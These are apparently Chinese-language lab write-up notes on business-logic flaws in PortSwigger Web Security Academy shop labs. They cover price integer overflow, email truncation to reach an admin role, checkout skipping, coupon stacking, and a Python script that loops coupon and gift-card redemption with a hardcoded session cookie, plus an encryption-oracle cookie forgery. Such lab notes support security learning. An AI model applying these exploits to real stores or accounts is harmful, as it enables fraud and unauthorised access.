给了100块 买价值1337的货
在历史包里发现
尝试直接修改价格
这里把加入购物车时价格可控的点修复了
但是数量可控 我们可以买负数的东西来加钱
但是返回Cart total price cannot be less than zero
那么控制一下价格 大于0即可
买大量的货 溢出上限即可
但是还是卡了我们 必须花钱
由于这里限制了一次最多加99 大概估计整数的上限是20M左右
需求: 删除carlos
访问admin路由
Admin interface only available if logged in as a DontWannaCry user
我们可以接收任何 以@exploit-0a2300c90469cc9d80ea5232011200d0.exploit-server.net结尾的邮箱
在这里超过255的字符会被截断
我们卡一下长度
注册完后直接更新邮箱
直接不提交旧密码
先跟一个正常的购买流程
/cart 添加进购物车 -> /cart/checkout 清算 -> /cart/order-confirmation?order-confirmed=true 结算
每个流程都重复发包 然后刷新观察
我们发现在checkout的时候就已经进扣钱了
尝试跳过checkout 添加购物车后直接confirm
这里false和true没影响好像
一开始是想看看能不能反悔
改administrator 和 admin 都没用
尝试login 然后drop掉role-selector
New customers use code at checkout: NEWCUST5
注册能领30 off 检测是否重复只检测上一个
然后俩折扣来回叠加
注册送券 SIGNUP30
买giftcart 赚3块 无限薅
现在需要实现自动化
添加购物车 -> 加券 -> 兑换
import requests
import re
csrfPartten = re.compile('<input required type="hidden" name="csrf" value=".*">')
codePartten = re.compile('<td>.*</td>')
url = "https://0add00500314e8f081b017cf00d400a0.web-security-academy.net/"
Cookie = "VpVhq6vKnkAwKWFRosMkSD8TFaaVJP27"
sess = requests.Session()
def do_cart():
data = {
"productId": 2,
"redir": "PRODUCT",
"quantity": 1
}
res = sess.post(url+"cart", data=data,cookies={"session":Cookie})
return res
def getCsrf():
res = sess.get(url+"my-account?id=wiener",
cookies={"session": Cookie})
csrf = re.findall(csrfPartten, res.text)[0]
return(csrf.split("=")[3].replace('"', "").replace(">", ""))
csrf = getCsrf()
def do_coupon():
data = {
"coupon":"SIGNUP30",
"csrf":csrf
}
res = sess.post(url+"cart/coupon", data=data,cookies={"session":Cookie})
return res
def do_checkout():
data = {
"csrf": csrf
}
res = sess.post(url+"cart/checkout", data=data,
cookies={"session": Cookie})
code = re.findall(codePartten, res.text)
return code[2:]
def do_redeem(code):
data = {
"gift-card": code[0].replace("<td>","").replace("</td>",""),
"csrf": csrf
}
res = sess.post(url+"gift-card", data=data,
cookies={"session": Cookie})
while True:
do_cart()
do_coupon()
do_redeem(do_checkout())
不考虑效率 跑个半个小时左右就好了
主要还是交互太慢了
post/comment处会将emil加密
猜测和stay-logged-in是同种方式
尝试将stay-logged-in的值解密
可以看见是用户名加时间戳 将其在emil处提交加密
administrator:1703222719341
前面还有Invalid email address:
23个字符
考虑到一般这种都是块加密 补齐至32个字符
然后把cipher的前32位删了